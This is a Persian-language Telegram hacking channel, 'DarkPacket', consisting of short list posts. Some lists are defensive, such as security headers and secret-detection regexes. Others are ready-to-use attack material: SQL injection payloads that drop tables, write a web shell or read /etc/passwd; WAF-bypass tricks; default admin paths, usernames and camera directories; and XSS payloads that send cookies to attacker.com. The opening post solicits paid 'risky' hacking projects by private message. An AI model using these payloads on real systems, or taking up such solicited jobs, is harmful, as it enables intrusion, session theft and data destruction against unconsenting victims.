DarkPacket
7.03K subscribers
36 photos
2 videos
56 files
68 links
> 🛡️ Ethical Hacking | Cyber Security

💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
رفقا پروژه ای داشتین پیوی در خدمتم
در ضمن درخاست نمیدونم هک روبیکا، هک تلگرام و... رو نکنین اینا بچه بازی نیستن باید هزار تا پلن بریم مهندسی اجتماعی و اینجور کسشرا لطفاً یک پروژه خوب و ریسک دار بدین❤️ قربونتون
@Net_activenull
11
لیست ۱۵ هدر امنیتی که هر وبسایت باید داشته باشد

اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.

X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=()
X-XSS-Protection: 1; mode=block
Cache-Control: no-store
Pragma: no-cache
Access-Control-Allow-Origin: https://example.com
Feature-Policy: camera 'none'
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Set-Cookie: Secure; HttpOnly; SameSite=Strict

به‌به
101
لیست ۱۰ ابزار ضروری برای تست امنیت (همه رایگان)

Nmap – اسکن شبکه و پورت
Burp Suite Community – تست برنامه تحت وب
Wireshark – تحلیل ترافیک شبکه
Nikto – اسکنر آسیب‌پذیری وب
SQLmap – تست تزریق SQL
Hydra – تست brute-force رمز عبور
Metasploit Framework – تست نفوذ کامل
Gobuster – پیدا کردن مسیرهای مخفی
John the Ripper – کرک پسورد
Aircrack-ng – تست امنیت وای‌فای
101
لیست ۲۰ اکستنشن فایل حساس که همیشه باید بررسی شوند

.env
.git
.sql
.bak
.zip
.tar.gz
.htaccess
.config
.json
.xml
.yml
.ini
.log
.tmp
.swp
.old
.php~
.key
.pem
.crt
101
لیست ۱۵ پارامتر آسیب‌پذیر رایج در URL (برای تست XSS و SQLi)

?id=
?page=
?search=
?q=
?query=
?redirect=
?url=
?file=
?path=
?dir=
?cmd=
?action=
?user=
?email=
?token=
91
لیست ۲۵ دایرکتوری پیش‌فرض دوربین‌های مداربسته و روترها

/cgi-bin/
/webcam/
/video/
/live/
/stream/
/onvif/
/axis-cgi/
/ptz/
/admin/
/setup/
/config/
/firmware/
/debug/
/telnet/
/cgi-bin/webproc
/goform/
/cgi-bin/luci
/cgi-bin/login
/security/
/network/
/wireless/
/status/
/log/
/diagnostics/
91
لیست ۲۰ هدر رایج که اطلاعات سرور را لو می‌دهند

Server: Apache/2.4.41
Server: nginx/1.18.0
Server: Microsoft-IIS/10.0
Server: LiteSpeed
X-Powered-By: PHP/7.4.33
X-Powered-By: ASP.NET
X-Powered-By: Express
X-AspNet-Version: 4.0.30319
X-Runtime: 0.123456
X-Drupal-Cache: HIT
X-Generator: WordPress 6.4.1
X-Varnish: 123456
Via: 1.1 varnish
X-Cache: HIT
X-Amz-Cf-Id: abc123
X-Backend-Server: web01
X-Request-ID: 1234567890
X-Debug-Token: abcdef123456
X-Trace-Id: 1234567890
X-Transaction-ID: abcdef123456
91
لیست ۱۵ خطای رایج که اطلاعات حساس لو می‌دهند

Warning: mysqli_fetch_array() expects parameter...
Fatal error: Uncaught Exception...
Notice: Undefined index: user in...
Parse error: syntax error, unexpected...
PDOException: SQLSTATE[42000]...
Stack trace: #0 /var/www/html...
ORA-00933: SQL command not properly ended
Microsoft OLE DB Provider for ODBC Drivers
TypeError: Cannot read property...
NullPointerException at com.example...
Debugging info: SELECT * FROM users...
Traceback (most recent call last)...
Warning: pg_connect(): Unable to connect...
MySQL server version for the right syntax...
Path: /home/user/public_html/...
91
لیست ۲۰ کوکی حساس که بعد از لاگین باید Secure باشند

PHPSESSID
JSESSIONID
ASP.NET_SessionId
sessionid
sid
session
token
auth_token
access_token
refresh_token
jwt
csrf_token
XSRF-TOKEN
laravel_session
connect.sid
wordpress_logged_in
woocommerce_cart_hash
remember_me
user_session
api_key
91
لیست ۱۵ مسیر پیش‌فرض پنل‌های مدیریتی معروف

/phpmyadmin/index.php
/admin/login.php
/administrator/index.php
/wp-login.php
/wp-admin/
/user/login
/auth/login
/login.html
/cpanel
/whm
/plesk
/roundcube
/webmail
/zimbra
/manager/html
91
لیست ۲۵ نام کاربری پیش‌فرض که هنوز خیلی‌ها استفاده می‌کنند

admin
administrator
root
user
test
guest
info
sysadmin
webmaster
manager
operator
supervisor
support
demo
backup
oracle
postgres
mysql
ftp
deploy
jenkins
git
vagrant
ubuntu
ec2-user
101
لیست ۲۰ پسوند فایل که معمولاً بکاپ یا اطلاعات حساس دارند

backup.zip
backup.tar.gz
db_backup.sql
database.sql.gz
dump.sql
export.sql
website.zip
www.zip
public_html.zip
htdocs.zip
site_backup.tar
backup_2024.zip
config.php.bak
index.php.old
wp-config.php.bak
.env.backup
users.sql
data.csv
export.csv
credentials.txt
91
لیست ۲۰ روش دور زدن فایروال و WAF (برای تست نفوذ)

1. URL Encoding Double: %2527
2. Unicode Encoding: %u0027
3. Hex Encoding: 0x27
4. Base64 Payload
5. Mixed Case: SeLeCt
6. Comment Injection: SEL/**/ECT
7. Null Byte: %00
8. Tab Injection: %09
9. New Line: %0A
10. Carriage Return: %0D
11. Double URL: /%2e%2e/
12. Path Traversal: ../../../
13. Chunked Transfer
14. HTTP Parameter Pollution
15. Content-Type Spoofing
16. User-Agent Bypass
17. Referer Bypass
18. Cookie Injection
19. Host Header Injection
20. Slowloris Attack
91
لیست ۲۵ الگوی Regex برای شناسایی اطلاعات حساس (Data Leakage)

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}\b (Email)
\b(?:\d[ -]*?){13,16}\b (Credit Card)
\b\d{3}-\d{2}-\d{4}\b (SSN)
\bAKIA[0-9A-Z]{16}\b (AWS Access Key)
\bASIA[0-9A-Z]{16}\b (AWS Temp Key)
AIza[0-9A-Za-z_-]{35} (Google API Key)
sk_live_[0-9a-zA-Z]{24,} (Stripe Secret Key)
ghp_[0-9a-zA-Z]{36} (GitHub Token)
xox[baprs]-[0-9a-zA-Z-]{10,} (Slack Token)
-----BEGIN RSA PRIVATE KEY----- (Private Key)
-----BEGIN OPENSSH PRIVATE KEY----- (SSH Key)
password\s*[:=]\s*\S+ (Password)
secret\s*[:=]\s*\S+ (Secret)
api[_-]?key\s*[:=]\s*\S+ (API Key)
token\s*[:=]\s*\S+ (Token)
Authorization\s*:\s*Bearer\s+\S+ (Bearer Token)
mongodb(\+srv)?://[^\s]+ (MongoDB URL)
postgres://[^\s]+ (PostgreSQL URL)
mysql://[^\s]+ (MySQL URL)
redis://[^\s]+ (Redis URL)
amqp://[^\s]+ (RabbitMQ URL)
ftp://[^\s]+ (FTP URL)
smtp://[^\s]+ (SMTP URL)
BEGIN PGP PRIVATE KEY (PGP Key)
\d{11} (Iran National ID)
91
لیست ۲۰ تکنیک پیشرفته SQL Injection

1. UNION SELECT null,null,null--
2. ORDER BY 10--
3. GROUP BY column HAVING 1=1--
4. AND 1=1--
5. AND 1=2--
6. OR 'a'='a'
7. '; DROP TABLE users--
8. ' UNION SELECT table_name FROM information_schema.tables--
9. ' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
10. ' AND SLEEP(5)--
11. ' AND BENCHMARK(10000000,SHA1('test'))--
12. ' INTO OUTFILE '/var/www/shell.php'--
13. ' INTO DUMPFILE '/etc/passwd'--
14. ' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
15. ' AND UPDATEXML(1,CONCAT(0x7e,USER()),1)--
16. '; EXEC xp_cmdshell 'dir'--
17. ' UNION SELECT LOAD_FILE('/etc/passwd')--
18. ' AND ORD(MID((SELECT password FROM users LIMIT 1),1,1))>100--
19. ' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
20. ';WAITFOR DELAY '00:00:05'--
91
لیست ۳۰ آدرس IP و رنج‌های خصوصی که باید بشناسید

10.0.0.0/8        - Private Network
172.16.0.0/12 - Private Network
192.168.0.0/16 - Private Network
127.0.0.1 - Localhost
0.0.0.0 - All Interfaces
169.254.0.0/16 - Link Local
224.0.0.0/4 - Multicast
255.255.255.255 - Broadcast
::1 - IPv6 Loopback
fe80::/10 - IPv6 Link Local
fc00::/7 - IPv6 Unique Local
192.168.1.1 - Router Default
192.168.0.1 - Router Default
10.0.0.1 - Router Default
10.10.10.1 - Router Default
172.16.0.1 - Router Default
192.168.1.100 - Common Device
192.168.0.100 - Common Device
10.0.0.100 - Common Device
10.10.10.10 - Common Device
172.16.0.100 - Common Device
192.168.1.254 - Common Gateway
192.168.0.254 - Common Gateway
10.0.0.254 - Common Gateway
8.8.8.8 - Google DNS
8.8.4.4 - Google DNS
1.1.1.1 - Cloudflare DNS
9.9.9.9 - Quad9 DNS
208.67.222.222 - OpenDNS
208.67.220.220 - OpenDNS
81
لیست ۲۰ ابزار آنلاین رایگان برای تحلیل و تست امنیت

1. VirusTotal - تحلیل فایل و URL
2. Shodan - موتور جستجوی دستگاه‌ها
3. Censys - شناسایی سرورها
4. Have I Been Pwned - بررسی لو رفتن ایمیل
5. dnsdumpster - نقشه DNS
6. crt.sh - جستجوی گواهینامه‌ها
7. SecurityHeaders - بررسی هدرهای امنیتی
8. SSL Labs - تست SSL/TLS
9. BuiltWith - شناسایی تکنولوژی سایت
10. Wappalyzer - شناسایی پلتفرم
11. URLScan - اسکن URL
12. Any.Run - آنالیز بدافزار
13. Hybrid Analysis - آنالیز فایل
14. AbuseIPDB - بررسی IP بد
15. GreyNoise - تحلیل ترافیک
16. FullHunt - شناسایی سرویس‌ها
17. Criminal IP - جستجوی امنیتی
18. LeakIX - شناسایی نشت اطلاعات
19. Dehashed - جستجوی دیتابیس‌ها
20. BrowserLeaks - تست نشت مرورگر
81
۲۵ تکنیک مهندسی اجتماعی که باید بشناسید (برای آگاهی)

1. Phishing Email
2. Spear Phishing
3. Whaling Attack
4. Vishing (Voice Phishing)
5. Smishing (SMS Phishing)
6. Pretexting
7. Baiting (USB Drop)
8. Tailgating (Piggybacking)
9. Quid Pro Quo
10. Scareware
11. Watering Hole Attack
12. Typosquatting
13. Homograph Attack
14. Clone Phishing
15. CEO Fraud
16. Invoice Scam
17. Tech Support Scam
18. Fake Login Page
19. Social Media Impersonation
20. QR Code Phishing (Quishing)
21. Deepfake Call
22. Job Offer Scam
23. Lottery Scam
24. Romance Scam
25. Emergency Scam
81
لیست ۲۵ آسیب‌پذیری رایج بر اساس OWASP Top 10

1. Broken Access Control - دسترسی غیرمجاز
2. Cryptographic Failures - شکست رمزنگاری
3. Injection - تزریق کد
4. Insecure Design - طراحی ناامن
5. Security Misconfiguration - پیکربندی نادرست
6. Vulnerable Components - کامپوننت آسیب‌پذیر
7. Auth Failures - شکست احراز هویت
8. Software Integrity Failures - شکست یکپارچگی
9. Logging Failures - شکست ثبت رویداد
10. SSRF - جعل درخواست سمت سرور
11. XSS - اسکریپت بین سایتی
12. CSRF - جعل درخواست بین سایتی
13. IDOR - ارجاع ناامن به آبجکت
14. LFI - گنجاندن فایل محلی
15. RFI - گنجاندن فایل راه دور
16. RCE - اجرای کد از راه دور
17. XXE - تزریق موجودیت خارجی XML
18. SSTI - تزریق قالب سمت سرور
19. Deserialization - سریال‌زدایی ناامن
20. Race Condition - شرایط رقابتی
21. Buffer Overflow - سرریز بافر
22. Path Traversal - پیمایش مسیر
23. Clickjacking - ربودن کلیک
24. Host Header Injection - تزریق هدر هاست
25. Cache Poisoning - مسمومیت کش
81
لیست ۲۰ پیلود آماده XSS برای تست (فقط روی سیستم خودتان)

<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<select onchange=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div onclick="alert(1)">click</div>
<script>alert(document.cookie)</script>
<img src=x onerror="alert(document.cookie)">
<script>fetch('https://attacker.com?c='+document.cookie)</script>
"><script>window.location='https://attacker.com?c='+document.cookie</script>
<script>document.write('<img src="https://attacker.com?c='+document.cookie+'">')</script>
'';!--"<XSS>=&{()}
<ScRiPt>alert(1)</sCrIpT>
<script src="https://attacker.com/xss.js"></script>
91
لیست ۲۰ مسیر پیش‌فرض Docker و Kubernetes

/var/run/docker.sock
/api/v1/namespaces
/api/v1/pods
/api/v1/services
/api/v1/secrets
/apis/apps/v1/deployments
/apis/rbac.authorization.k8s.io/v1/clusterroles
/healthz
/metrics
/debug/pprof
/version
/swagger.json
/openapi/v2
/dashboard
/kubernetes-dashboard
/api/v1/configmaps
/api/v1/serviceaccounts
/apis/networking.k8s.io/v1/ingresses
/api/v1/persistentvolumes
/apis/batch/v1/jobs
111